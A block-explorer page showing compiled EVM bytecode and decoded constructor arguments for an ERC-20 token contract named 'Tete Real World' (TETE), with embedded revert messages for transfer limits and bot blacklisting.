d5b610d12611f35565b82610d1d919061346d565b9050919050565b60006012905090565b600080610d38611630565b9050610d59818585610d4a85896113e1565b610d54919061349e565b611638565b600191505092915050565b60004790506000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051610db190613503565b60006040518083038185875af1925050503d8060008114610dee576040519150601f19603f3d011682016040523d82523d6000602084013e610df3565b606091505b5050809150505050565b600b5481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161480610e915750610e62611071565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16145b610ed0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ec79061358a565b60405180910390fd5b80601760036101000a81548160ff02191690831515021790555050565b60145481565b600a5481565b60106020528060005260406000206000915054906101000a900460ff1681565b6000606482610f2730610f54565b610f3191906135aa565b610f3b919061346d565b90506000811115610f5057610f4f81611f51565b5b5050565b6000610f9e600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610cc3565b9050919050565b610fad611801565b610fb760006122d5565b565b610fc1611801565b606481610fcc610c02565b610fd691906135aa565b610fe0919061346d565b600a8190555050565b610ff1611801565b801561103457816018600082015181600001556020820151816001015560408201518160020155606082015181600301556080820151816004015590505061106d565b81601d60008201518160000155602082015181600101556040820151816002015560608201518160030155608082015181600401559050505b5050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600480546110aa9061334c565b80601f01602080910402602001604051908101604052809291908181526020018280546110d69061334c565b80156111235780601f106110f857610100808354040283529160200191611123565b820191906000526020600020905b81548152906001019060200180831161110657829003601f168201915b5050505050905090565b611135611801565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f194c6407864834414a3adaa18aab4cb81b733d5986a0c3b1e0fc9a8bccc0c0fb60405160405180910390a36111e3600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000610c0c565b81600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550611251600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001610c0c565b5050565b60116020528060005260406000206000915054906101000a900460ff1681565b60126020528060005260406000206000915054906101000a900460ff1681565b6000806112a0611630565b905060006112ae82866113e1565b9050838110156112f3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112ea9061365e565b60405180910390fd5b6113008286868403611638565b60019250505092915050565b600080611317611630565b905061132481858561190b565b600191505092915050565b600c5481565b60228060000154908060010154908060020154908060030154908060040154905085565b60165481565b611367611801565b80601760026101000a81548160ff0219169083151502179055507f53726dfcaf90650aa7eb35524f4d3220f07413c8d6cb404cc8c18bf5591bc159816040516113b09190612ee7565b60405180910390a150565b60136020528060005260406000206000915054906101000a900460ff1681565b60155481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b611470611801565b80601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015157f3159dadbd8e2d720a851b412e3358e7e44bb11734c9bfd5715340e21798e8b25836040516114f9919061326f565b60405180910390a25050565b61150d611801565b606481611518610c02565b61152291906135aa565b61152c919061346d565b600c8190555050565b60188060000154908060010154908060020154908060030154908060040154905085565b611561611801565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036115d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115c7906136f0565b60405180910390fd5b6115d9816122d5565b50565b6115e4611801565b6064816115ef610c02565b6115f991906135aa565b611603919061346d565b600b8190555050565b601d8060000154908060010154908060020154908060030154908060040154905085565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036116a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161169e90613782565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611716576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161170d90613814565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516117f49190612f7c565b60405180910390a3505050565b611809611630565b73ffffffffffffffffffffffffffffffffffffffff16611827611071565b73ffffffffffffffffffffffffffffffffffffffff161461187d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161187490613880565b60405180910390fd5b565b600061188b84846113e1565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461190557818110156118f7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118ee906138ec565b60405180910390fd5b6119048484848403611638565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361197a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119719061397e565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119e9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119e090613a10565b60405180910390fd5b601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611a76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a6d90613a7c565b60405180910390fd5b60008111611ab9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ab090613b0e565b60405180910390fd5b611ac283610f54565b811115611b04576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611afb90613ba0565b60405180910390fd5b6000601160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680611ba75750601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1590508015611d7257601360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611cf257601760009054906101000a900460ff16611c6f576001601060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b601860226000820154816000015560018201548160010155600282015481600201556003820154816003015560048201548160040155905050600b54821115611ced576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ce490613c0c565b60405180910390fd5b611d71565b601d60226000820154816000015560018201548160010155600282015481600201556003820154816003015560048201548160040155905050600c54821115611d70576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d6790613c9e565b60405180910390fd5b5b5b601760019054906101000a900460ff16158015611dd95750601360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015611df15750601760029054906101000a900460ff165b8015611e305750611e00611071565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015611e6f5750611e3f611071565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b8015611ec95750600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015611edf5750600d54611edc30610f54565b10155b15611f23576001601760016101000a81548160ff021916908315150217905550611f0761239b565b6000601760016101000a81548160ff0219169083151502179055505b611f2f848484846123ef565b50505050565b6000611f3f610c02565b600654611f4c919061346d565b905090565b6000602760040154602760030154602760020154611f6f919061349e565b611f79919061349e565b905060008060028360276004015486611f9291906135aa565b611f9c919061346d565b611fa6919061346d565b905060008185611fb69190613cbe565b90506000479050611fc6826127bc565b60008147611fd49190613cbe565b905060008660276003015483611fea91906135aa565b611ff4919061346d565b90506000876027600201548461200a91906135aa565b612014919061346d565b905060008183856120259190613cbe565b61202f9190613cbe565b905060276004015460156000828254612048919061349e565b92505081905550600060276004018190555060006027600201819055506000602760030181905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16826040516120b690613503565b60006040518083038185875af1925050503d80600081146120f3576040519150601f19603f3d011682016040523d82523d6000602084013e6120f8565b606091505b50508098505060008711801561210e5750600081115b801561212d575060011515601760039054906101000a900460ff161515145b1561223b57600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d71982308a600080600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518863ffffffff1660e01b81526004016121bb96959493929190613d4e565b60606040518083038185885af11580156121d9573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906121fe9190613dc4565b5050507f38f8a0c92f4c5b0b6877f878cb4c0c8d348a47b76d716c8e78f425043df9515b8782604051612232929190613e17565b60405180910390a15b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168360405161228190613503565b60006040518083038185875af1925050503d80600081146122be576040519150601f19603f3d011682016040523d82523d6000602084013e6122c3565b606091505b50508098505050505050505050505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006123a630610f54565b9050600d548111156123ec576014600d546123c191906135aa565b8111156123da576014600d546123d791906135aa565b90505b6123eb6123e630610f54565b611f51565b5b50565b6123f7612c80565b6123ff612c80565b61240984846129d2565b809250819350505060008260c00151856124239190613cbe565b9050600061242f611f35565b8661243a91906135aa565b905060008360c001518261244e9190613cbe565b9050601260008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806124bd5750600a54836124b08a610f54565b6124ba919061349e565b11155b6124fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124f390613eb2565b60405180910390fd5b81600e60008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461254b9190613cbe565b9250508190555080600e60008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546125a1919061349e565b92505081905550851561274c578360000151600660008282546125c49190613cbe565b925050819055508460000151601460008282546125e1919061349e565b925050819055506125f28585612bc2565b600060226000015411156126e257846020015160166000828254612616919061349e565b925050819055508360200151600e60008073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254612670919061349e565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff163073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87602001516040516126d99190612f7c565b60405180910390a35b3073ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8760a001516040516127439190612f7c565b60405180910390a35b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516127a99190612f7c565b60405180910390a3505050505050505050565b6000600267ffffffffffffffff8111156127d9576127d8613119565b5b6040519080825280602002602001820160405280156128075781602001602082028036833780820191505090505b509050308160008151811061281f5761281e613ed2565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156128c6573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906128ea9190613f16565b816001815181106128fe576128fd613ed2565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b815260040161299c959493929190614001565b600060405180830381600087803b1580156129b657600080fd5b505af11580156129ca573d6000803e3d6000fd5b505050505050565b6129da612c80565b6129e2612c80565b8215612bbb5760006129f2611f35565b9050606460226004015486612a0791906135aa565b612a11919061346d565b836000018181525050606460226000015486612a2d91906135aa565b612a37919061346d565b836020018181525050606460226003015486612a5391906135aa565b612a5d919061346d565b836040018181525050606460226002015486612a7991906135aa565b612a83919061346d565b836060018181525050606460226001015486612a9f91906135aa565b612aa9919061346d565b836080018181525050826080015183606001518460400151612acb919061349e565b612ad5919061349e565b8360a00181815250508260a0015183602001518460000151612af7919061349e565b612b01919061349e565b8360c0018181525050808360000151612b1a91906135aa565b826000018181525050808360200151612b3391906135aa565b826020018181525050808360400151612b4c91906135aa565b826040018181525050808360600151612b6591906135aa565b826060018181525050808360800151612b7e91906135aa565b826080018181525050808360c00151612b9791906135aa565b8260c0018181525050808360a00151612bb091906135aa565b8260a0018181525050505b9250929050565b8060a00151600e60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254612c15919061349e565b92505081905550816080015160276004016000828254612c35919061349e565b92505081905550816040015160276002016000828254612c55919061349e565b92505081905550816060015160276003016000828254612c75919061349e565b925050819055505050565b6040518060e00160405280600081526020016000815260200160008152602001600081526020016000815260200160008152602001600081525090565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b6000612d02612cfd612cf884612cbd565b612cdd565b612cbd565b9050919050565b6000612d1482612ce7565b9050919050565b6000612d2682612d09565b9050919050565b612d3681612d1b565b82525050565b6000602082019050612d516000830184612d2d565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015612d91578082015181840152602081019050612d76565b60008484015250505050565b6000601f19601f8301169050919050565b6000612db982612d57565b612dc38185612d62565b9350612dd3818560208601612d73565b612ddc81612d9d565b840191505092915050565b60006020820190508181036000830152612e018184612dae565b905092915050565b6000604051905090565b600080fd5b6000612e2382612cbd565b9050919050565b612e3381612e18565b8114612e3e57600080fd5b50565b600081359050612e5081612e2a565b92915050565b6000819050919050565b612e6981612e56565b8114612e7457600080fd5b50565b600081359050612e8681612e60565b92915050565b60008060408385031215612ea357612ea2612e13565b5b6000612eb185828601612e41565b9250506020612ec285828601612e77565b9150509250929050565b60008115159050919050565b612ee181612ecc565b82525050565b6000602082019050612efc6000830184612ed8565b92915050565b6000612f0d82612cbd565b9050919050565b612f1d81612f02565b8114612f2857600080fd5b50565b600081359050612f3a81612f14565b92915050565b600060208284031215612f5657612f55612e13565b5b6000612f6484828501612f2b565b91505092915050565b612f7681612e56565b82525050565b6000602082019050612f916000830184612f6d565b92915050565b612fa081612ecc565b8114612fab57600080fd5b50565b600081359050612fbd81612f97565b92915050565b60008060408385031215612fda57612fd9612e13565b5b6000612fe885828601612e41565b9250506020612ff985828601612fae565b9150509250929050565b60008060006060848603121561301c5761301b612e13565b5b600061302a86828701612e41565b935050602061303b86828701612e41565b925050604061304c86828701612e77565b9150509250925092565b60006020828403121561306c5761306b612e13565b5b600061307a84828501612e77565b91505092915050565b600060ff82169050919050565b61309981613083565b82525050565b60006020820190506130b46000830184613090565b92915050565b6000602082840312156130d0576130cf612e13565b5b60006130de84828501612fae565b91505092915050565b6000602082840312156130fd576130fc612e13565b5b600061310b84828501612e41565b91505092915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61315182612d9d565b810181811067ffffffffffffffff821117156131705761316f613119565b5b80604052505050565b6000613183612e09565b905061318f8282613148565b919050565b600060a082840312156131aa576131a9613114565b5b6131b460a0613179565b905060006131c484828501612e77565b60008301525060206131d884828501612e77565b60208301525060406131ec84828501612e77565b604083015250606061320084828501612e77565b606083015250608061321484828501612e77565b60808301525092915050565b60008060c0838503121561323757613236612e13565b5b600061324585828601613194565b92505060a061325685828601612fae565b9150509250929050565b61326981612e18565b82525050565b60006020820190506132846000830184613260565b92915050565b600060a08201905061329f6000830188612f6d565b6132ac6020830187612f6d565b6132b96040830186612f6d565b6132c66060830185612f6d565b6132d36080830184612f6d565b9695505050505050565b600080604083850312156132f4576132f3612e13565b5b600061330285828601612e41565b925050602061331385828601612e41565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061336457607f821691505b6020821081036133775761337661331d565b5b50919050565b7f416d6f756e74206d757374206265206c657373207468616e20746f74616c207260008201527f65666c656374696f6e7300000000000000000000000000000000000000000000602082015250565b60006133d9602a83612d62565b91506133e48261337d565b604082019050919050565b60006020820190508181036000830152613408816133cc565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061347882612e56565b915061348383612e56565b9250826134935761349261340f565b5b828204905092915050565b60006134a982612e56565b91506134b483612e56565b92508282019050808211156134cc576134cb61343e565b5b92915050565b600081905092915050565b50565b60006134ed6000836134d2565b91506134f8826134dd565b600082019050919050565b600061350e826134e0565b9150819050919050565b7f4f6e6c7920646576656c6f706572732063616e206368616e676520746869732060008201527f666c616700000000000000000000000000000000000000000000000000000000602082015250565b6000613574602483612d62565b915061357f82613518565b604082019050919050565b600060208201905081810360008301526135a381613567565b9050919050565b60006135b582612e56565b91506135c083612e56565b92508282026135ce81612e56565b915082820484148315176135e5576135e461343e565b5b5092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000613648602583612d62565b9150613653826135ec565b604082019050919050565b600060208201905081810360008301526136778161363b565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006136da602683612d62565b91506136e58261367e565b604082019050919050565b60006020820190508181036000830152613709816136cd565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061376c602483612d62565b915061377782613710565b604082019050919050565b6000602082019050818103600083015261379b8161375f565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006137fe602283612d62565b9150613809826137a2565b604082019050919050565b6000602082019050818103600083015261382d816137f1565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061386a602083612d62565b915061387582613834565b602082019050919050565b600060208201905081810360008301526138998161385d565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006138d6601d83612d62565b91506138e1826138a0565b602082019050919050565b60006020820190508181036000830152613905816138c9565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000613968602583612d62565b91506139738261390c565b604082019050919050565b600060208201905081810360008301526139978161395b565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006139fa602383612d62565b9150613a058261399e565b604082019050919050565b60006020820190508181036000830152613a29816139ed565b9050919050565b7f45524332303a206164647265737320626c61636b6c69737465642028626f7429600082015250565b6000613a66602083612d62565b9150613a7182613a30565b602082019050919050565b60006020820190508181036000830152613a9581613a59565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000613af8602983612d62565b9150613b0382613a9c565b604082019050919050565b60006020820190508181036000830152613b2781613aeb565b9050919050565b7f596f752061726520747279696e6720746f207472616e73666572206d6f72652060008201527f7468616e20796f75722062616c616e6365000000000000000000000000000000602082015250565b6000613b8a603183612d62565b9150613b9582613b2e565b604082019050919050565b60006020820190508181036000830152613bb981613b7d565b9050919050565b7f616d6f756e74206d757374206265203c3d206d61785478416d6f756e74427579600082015250565b6000613bf6602083612d62565b9150613c0182613bc0565b602082019050919050565b60006020820190508181036000830152613c2581613be9565b9050919050565b7f616d6f756e74206d757374206265203c3d206d61785478416d6f756e7453656c60008201527f6c00000000000000000000000000000000000000000000000000000000000000602082015250565b6000613c88602183612d62565b9150613c9382613c2c565b604082019050919050565b60006020820190508181036000830152613cb781613c7b565b9050919050565b6000613cc982612e56565b9150613cd483612e56565b9250828203905081811115613cec57613ceb61343e565b5b92915050565b6000819050919050565b6000613d17613d12613d0d84613cf2565b612cdd565b612e56565b9050919050565b613d2781613cfc565b82525050565b6000613d3882612d09565b9050919050565b613d4881613d2d565b82525050565b600060c082019050613d636000830189613260565b613d706020830188612f6d565b613d7d6040830187613d1e565b613d8a6060830186613d1e565b613d976080830185613d3f565b613da460a0830184612f6d565b979650505050505050565b600081519050613dbe81612e60565b92915050565b600080600060608486031215613ddd57613ddc612e13565b5b6000613deb86828701613daf565b9350506020613dfc86828701613daf565b9250506040613e0d86828701613daf565b9150509250925092565b6000604082019050613e2c6000830185612f6d565b613e396020830184612f6d565b9392505050565b7f526563697069656e742063616e6e6f7420686f6c64206d6f7265207468616e2060008201527f6d617857616c6c6574416d6f756e740000000000000000000000000000000000602082015250565b6000613e9c602f83612d62565b9150613ea782613e40565b604082019050919050565b60006020820190508181036000830152613ecb81613e8f565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050613f1081612e2a565b92915050565b600060208284031215613f2c57613f2b612e13565b5b6000613f3a84828501613f01565b91505092915050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b613f7881612e18565b82525050565b6000613f8a8383613f6f565b60208301905092915050565b6000602082019050919050565b6000613fae82613f43565b613fb88185613f4e565b9350613fc383613f5f565b8060005b83811015613ff4578151613fdb8882613f7e565b9750613fe683613f96565b925050600181019050613fc7565b5085935050505092915050565b600060a0820190506140166000830188612f6d565b6140236020830187613d1e565b81810360408301526140358186613fa3565b90506140446060830185613260565b6140516080830184612f6d565b969550505050505056fea264697066735822122006032dc04b4954b151e8165cb3dbe59753a0b823c3cdac3e189b995e815f5c1064736f6c63430008110033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000000000000f54657465205265616c20576f726c64000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000045445544500000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : swap (address): 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
Arg [1] : name (string): Tete Real World
Arg [2] : symbol (string): TETE
-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [2] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [3] : 000000000000000000000000000000000000000000000000000000000000000f
Arg [4] : 54657465205265616c20576f726c640000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [6] : 5445544500000000000000000000000000000000000000000000000000000000
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.